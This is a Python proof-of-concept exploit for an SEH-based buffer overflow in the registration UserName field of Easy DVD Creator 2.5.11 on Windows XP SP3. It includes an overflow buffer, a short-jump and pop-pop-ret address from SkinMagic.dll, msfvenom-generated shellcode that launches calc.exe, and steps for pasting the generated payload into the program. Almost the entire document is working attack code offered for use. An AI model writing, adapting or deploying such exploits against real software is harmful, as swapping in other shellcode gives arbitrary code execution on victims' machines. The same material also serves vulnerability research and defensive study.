#!/usr/bin/env python # Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH) # Discovery by : Shubham Singh # Known As : Spirited Wolf [Twitter: @Pwsecspirit] # Email : spiritedwolf@protonmail.com # Youtube Channel : www.youtube.com/c/Pentestingwithspirit # Discovey Date : 29/07/2018 # Software Link : http://www.divxtodvd.net/dvd-creator.htm # Tested Version : 2.5.11 # Tested on OS : Windows XP Service Pack 3 x86 # Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt". # Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register". # In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up. # Greetz : @FuzzySec @LiveOverflow @hexachordanu buffer = "\x41" * 996 #Short Jump address nseh = "\xeb\x06\x90\x90" #0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, # v1.8.1.1 (C:\Program Files\Easy DVD Creator\SkinMagic.dll) seh= "\x59\x78\x03\x10" #badchar \x00\x0a\x0d #msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python buf = "" buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33" buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51" buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f" buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc" buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f" buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4" buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d" buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8" buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a" buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12" buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20" buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35" buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5" buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68" buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6" buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28" buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba" nops = "\x90" * 16 exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf)) f = open ("exploit.txt", "w") f.write(exploit) f.close()